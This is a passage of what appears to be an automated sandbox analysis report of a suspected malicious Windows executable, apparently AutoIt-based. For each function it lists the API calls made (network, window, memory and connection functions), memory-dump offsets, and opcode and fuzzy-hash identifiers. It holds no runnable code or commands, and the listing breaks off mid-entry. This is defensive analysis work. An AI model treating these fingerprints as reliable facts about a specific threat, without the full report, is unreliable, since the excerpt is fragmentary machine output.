                                                    • Part of subcall function 00BDFC86: _wcscpy.LIBCMT ref: 00BDFCA9
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                  • __wcsnicmp.LIBCMT ref: 00C2B02D
                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00C2B0F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                  • String ID: LPT
                                                  • API String ID: 3222508074-1350329615
                                                  • Opcode ID: 1692e25620f4a8230c0373539b1a057d9a0d01987919cd3d654d1706f11c7608
                                                  • Instruction ID: 68b03b8fc4898591e62eb50e77e213ae5178c41ec5ceaf4ad4f49ab0730641ff
                                                  • Opcode Fuzzy Hash: 1692e25620f4a8230c0373539b1a057d9a0d01987919cd3d654d1706f11c7608
                                                  • Instruction Fuzzy Hash: 95618075A00225AFDB14DF94D895EAEB7F4FF08710F1040A9F926AB791DB70AE80CB50
                                                  Function 00BD2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNEL32(00000000), ref: 00BD2968
                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00BD2981
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemorySleepStatus
                                                  • String ID: @
                                                  • API String ID: 2783356886-2766056989
                                                  • Opcode ID: b297e3b9b1cd51df79bf767dcf61567b7211b9425a843caf6e59f24d2c9fbffd
                                                  • Instruction ID: 49dcbca3c2899b157f02518479fbd33e1f977244c99a836e789c9a86c3be208c
                                                  • Opcode Fuzzy Hash: b297e3b9b1cd51df79bf767dcf61567b7211b9425a843caf6e59f24d2c9fbffd
                                                  • Instruction Fuzzy Hash: DB5128714187449BE320EF10D886BAFBBE8FF85354F41889DF2D8421A1DB718569CB66
                                                  Function 00C3258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C3259E
                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C325D4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CrackInternet_memset
                                                  • String ID: |
                                                  • API String ID: 1413715105-2343686810
                                                  • Opcode ID: 8aad4972398853298fa07f976945f02836204a6968c0088bacf14153d5e6ddb0
                                                  • Instruction ID: fa02b0020d4175d4d2f5f559ac89064cc55b130967d15653611041b6f6d93fa3
                                                  • Opcode Fuzzy Hash: 8aad4972398853298fa07f976945f02836204a6968c0088bacf14153d5e6ddb0
                                                  • Instruction Fuzzy Hash: 67310A71810119ABCF11EFA1CC86EEEBFB8FF08310F10009AF915A6162DB315A56DF60
                                                  Function 00C47A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00C47B61
                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C47B76
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: '
                                                  • API String ID: 3850602802-1997036262
                                                  • Opcode ID: f607817e60ade490d9a18381a4c2216aa45bcad64e864f4a04419b246d7c2620
                                                  • Instruction ID: ba33925c2f20f8e926d5ff42c37217964dd647bcfcf1689e1f2ec3a81c4efc09
                                                  • Opcode Fuzzy Hash: f607817e60ade490d9a18381a4c2216aa45bcad64e864f4a04419b246d7c2620
                                                  • Instruction Fuzzy Hash: 8C41F874A0520A9FDB14CF65C981BEEBBB9FF09300F10526AE914EB391D770AA51DF90
                                                  Function 00C46A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00C46B17
                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C46B53
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$DestroyMove
                                                  • String ID: static
                                                  • API String ID: 2139405536-2160076837
                                                  • Opcode ID: a18506cf4dd6e68311fefd118f043dd7faa112e5a6d9feb7dc5055f92fbafb01
                                                  • Instruction ID: 17bf1bfa144fecdb1b7c2cca15b83d1162a6c96775a0532d7e5cd912835566d9
                                                  • Opcode Fuzzy Hash: a18506cf4dd6e68311fefd118f043dd7faa112e5a6d9feb7dc5055f92fbafb01
                                                  • Instruction Fuzzy Hash: 10318A71200604AEEB109F68CC80BFB73A9FF49764F10862DF9A9D7190DA31AC91DB61
                                                  Function 00C228A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C22911
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C2294C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: 4ce608f03cce20ea73c077d910092ea5f3d0221d40017f6daa675c9c9acb0cfc
                                                  • Instruction ID: 541767c35863359d49c6d221b6367f2106b07e4f7f89b69acd59fe7e7fa45bea
                                                  • Opcode Fuzzy Hash: 4ce608f03cce20ea73c077d910092ea5f3d0221d40017f6daa675c9c9acb0cfc
                                                  • Instruction Fuzzy Hash: 6131F231A00315BBEB24EF49EC85BEEBBF8EF05350F140029ED91A65A0D7709A80DB11
                                                  Function 00C339E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __snwprintf.LIBCMT ref: 00C33A66
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __snwprintf_memmove
                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                  • API String ID: 3506404897-2584243854
                                                  • Opcode ID: 3f8e4abe6b144d009f633fbf8584fc63281a26cd402c636d2b0fd01da1787d6e
                                                  • Instruction ID: 071556d13928791874e337a40715c4364093867c25fe23aece533637757f848f
                                                  • Opcode Fuzzy Hash: 3f8e4abe6b144d009f633fbf8584fc63281a26cd402c636d2b0fd01da1787d6e
                                                  • Instruction Fuzzy Hash: 54219E30740259ABCF11EFA4CC86EAE77F5EF44710F5044A8F549AB181DB30EA45DB61
                                                  Function 00C466D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C46761
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C4676C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: Combobox
                                                  • API String ID: 3850602802-2096851135
                                                  • Opcode ID: f5d5c68596bf4a3900969671d6ac37a81ccae8d5b34030690a9acfe3897b43ed
                                                  • Instruction ID: c719ec5791ae2a6cb7679d1a950b77844b41a91be46afac785915ad34bd1617f
                                                  • Opcode Fuzzy Hash: f5d5c68596bf4a3900969671d6ac37a81ccae8d5b34030690a9acfe3897b43ed
                                                  • Instruction Fuzzy Hash: 7F11B275200208AFEF118F54CC80FFB376AFB4A3A8F114129F92897294D671DD5187A1
                                                  Function 00C46C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BC1D73
                                                    • Part of subcall function 00BC1D35: GetStockObject.GDI32(00000011), ref: 00BC1D87
                                                    • Part of subcall function 00BC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BC1D91
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C46C71
                                                  • GetSysColor.USER32(00000012), ref: 00C46C8B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                  • String ID: static
                                                  • API String ID: 1983116058-2160076837
                                                  • Opcode ID: 56b232196719f10294efd71676d671efb60e24015c143951aafa845a28685c97
                                                  • Instruction ID: 35659d772313c5fd0dda4f652a93078a5137d842b58f3de9c1e3c560153a0b19
                                                  • Opcode Fuzzy Hash: 56b232196719f10294efd71676d671efb60e24015c143951aafa845a28685c97
                                                  • Instruction Fuzzy Hash: DB212676620209AFDF04DFA8CC85EFA7BB8FB09314F014629FD95E2250D635E851DB61
                                                  Function 00C46920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00C469A2
                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C469B1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: LengthMessageSendTextWindow
                                                  • String ID: edit
                                                  • API String ID: 2978978980-2167791130
                                                  • Opcode ID: 4df4126315ceab836f9e8073f280e3efc1792409157a58d7643b38a937ff908f
                                                  • Instruction ID: 316bc1eb6687617939556b1ecbdf38530613c448138fb32f36344d83aff08c57
                                                  • Opcode Fuzzy Hash: 4df4126315ceab836f9e8073f280e3efc1792409157a58d7643b38a937ff908f
                                                  • Instruction Fuzzy Hash: 14116A71510208ABEB108E649C40BEB37A9FB263B8F504728F9B5971E4C6B1DC91A761
                                                  Function 00C229AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C22A22
                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00C22A41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: 1aae66eb6c43eb786e2a03ab1ed818ba6bdd80f6b07f7bf727bf9d2c6e977245
                                                  • Instruction ID: 97898033623ef7ecd63895371f43fda29d6cf5eb7ecbe5565b9371d0ca20310f
                                                  • Opcode Fuzzy Hash: 1aae66eb6c43eb786e2a03ab1ed818ba6bdd80f6b07f7bf727bf9d2c6e977245
                                                  • Instruction Fuzzy Hash: 3711D372D01124FBCB34EB58EC44BAEB3A8AB45300F044021E865EBA90D770AE06E791
                                                  Function 00C321D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C3222C
                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C32255
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Internet$OpenOption
                                                  • String ID: <local>
                                                  • API String ID: 942729171-4266983199
                                                  • Opcode ID: 214648ab68aff3713c775639475976851171a8b53d53061dbfa892b4a03c6b1a
                                                  • Instruction ID: d0473b155adc082d42699d12ee10a20d0cb7e2f402511cd64ff34121d005b10a
                                                  • Opcode Fuzzy Hash: 214648ab68aff3713c775639475976851171a8b53d53061dbfa892b4a03c6b1a
                                                  • Instruction Fuzzy Hash: F111C270551225BADF258F52CC88FFBFBA8FF16761F10822AFA2546000D2715A95D6F0
                                                  Function 00C18E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                    • Part of subcall function 00C1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C1AABC
                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C18E73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: e336981018094eaa02a0cfa07be73aabfcaf1d96f330475636a7d05eb00165c9
                                                  • Instruction ID: 7881a21281ff742bc231753ec1a0418242dbd956050e523375ad8d97be59034a
                                                  • Opcode Fuzzy Hash: e336981018094eaa02a0cfa07be73aabfcaf1d96f330475636a7d05eb00165c9
                                                  • Instruction Fuzzy Hash: 6C0128B5645219ABCB14EBA0CC41DFE73A8EF07360F14066DF836672D1DE31584CEA60
                                                  Function 00C28D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __fread_nolock_memmove
                                                  • String ID: EA06
                                                  • API String ID: 1988441806-3962188686
                                                  • Opcode ID: b5258a58f5e4f9d39cf3389db30ac179d656ecd32869c0b4d73ee4c0270ea66e
                                                  • Instruction ID: f5f21431cafa782adbc6544c97152dd43261828a5aca646679ee872c00332466
                                                  • Opcode Fuzzy Hash: b5258a58f5e4f9d39cf3389db30ac179d656ecd32869c0b4d73ee4c0270ea66e
                                                  • Instruction Fuzzy Hash: 6001F971D042587EDB28CAA9C816EFE7BF8DB11311F00459AF552D2181E974E6088760
                                                  Function 00C18CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                    • Part of subcall function 00C1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C1AABC
                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C18D6B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: f703fddc95be09b4a04baaf466b4fe9e703b1335a589adeb310bbe9c503fbb2e
                                                  • Instruction ID: f2dc3af1824cb1a809a10151566f97608f228adaadcbd66197fe5038c78fd975
                                                  • Opcode Fuzzy Hash: f703fddc95be09b4a04baaf466b4fe9e703b1335a589adeb310bbe9c503fbb2e
                                                  • Instruction Fuzzy Hash: F801D4B1A4520AABCF14EBA0C952FFE73A89F16340F100069B806672D1DE205E4CE672
                                                  Function 00C18D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                    • Part of subcall function 00C1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C1AABC
                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C18DEE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: d05a968340057009b4ae0383b55968a4579f7271687754e3354ff451bf12b089
                                                  • Instruction ID: 7c16090ff98fb30212178de24d361d8919421988ec059ab202bb69958f0c20ac
                                                  • Opcode Fuzzy Hash: d05a968340057009b4ae0383b55968a4579f7271687754e3354ff451bf12b089
                                                  • Instruction Fuzzy Hash: E201F7B1A4520AA7CB10F6A4C942FFE73AC9F16340F104069B806B32D1DE215E4DF672
                                                  Function 00C24F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp
                                                  • String ID: #32770
                                                  • API String ID: 2292705959-463685578
                                                  • Opcode ID: 2b20ec606c40a67039907a1afe522193be5868f62c3c8b452641ccde4f7e04eb
